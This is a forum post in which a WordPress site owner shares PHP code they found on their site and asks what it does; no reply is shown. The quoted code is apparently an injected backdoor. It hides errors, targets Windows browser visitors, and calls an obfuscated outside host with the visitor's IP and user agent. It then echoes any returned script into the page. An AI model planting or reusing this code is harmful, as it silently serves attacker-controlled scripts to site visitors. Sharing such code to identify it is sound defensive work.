Results 1 to 10 of 15
Threaded View
-
1st Aug 2012, 07:42 AM #1OPMember
Suspicious Wordpress Code
i saw this code in my wordpress website. i was wondering what is this code. Because i cant remember putting this code in my site.
here it is.
<?php $wp_rssh = 'http'; $wp_gt = 'get'; error_reporting(0); ini_set('display_errors',0); $wp_uagent = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Firefox|MSIE/i', $wp_uagent) && preg_match ('/ NT/i', $wp_uagent))){
$wp_gturl=$wp_rssh."://".$wp_rssh."s".$wp_gt.".com/".$wp_gt."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_uagent);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_gturl);
curl_setopt ($ch, CURLOPT_TIMEOUT, 10); $wp_cntnt = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_cntnt,1,3) === 'scr' ){ echo $wp_cntnt; } ?>trival Reviewed by trival on . Suspicious Wordpress Code i saw this code in my wordpress website. i was wondering what is this code. Because i cant remember putting this code in my site. here it is. <?php $wp_rssh = 'http'; $wp_gt = 'get'; error_reporting(0); ini_set('display_errors',0); $wp_uagent = @$_SERVER; if (( preg_match ('/Firefox|MSIE/i', $wp_uagent) && preg_match ('/ NT/i', $wp_uagent))){ $wp_gturl=$wp_rssh."://".$wp_rssh."s".$wp_gt.".com/".$wp_gt."/?ip=".$_SERVER."&referer=".urlencode($_SERVER)."&ua=".urlencode($wp_uagent); $ch = Rating: 5
Sponsored Links
Thread Information
Users Browsing this Thread
There are currently 1 users browsing this thread. (0 members and 1 guests)
Similar Threads
-
Help Me Please.. Code PHP Wordpress
By fedro$a in forum Web Development AreaReplies: 5Last Post: 27th Jun 2012, 12:11 PM -
Wordpress Code help
By .nItIsH. in forum Technical Help Desk SupportReplies: 0Last Post: 22nd Jan 2012, 03:22 PM -
[Hiring] Code WordPress Theme
By dima1236 in forum Completed TransactionsReplies: 3Last Post: 23rd Oct 2011, 03:08 PM -
tag code for wordpress
By Majky71 in forum WordpressReplies: 5Last Post: 2nd Oct 2011, 02:02 PM -
Wordpress code help
By RT in forum WordpressReplies: 1Last Post: 20th Dec 2009, 12:34 AM
themaManager - edit and manage...
Version 4.22 released. Open older version (or...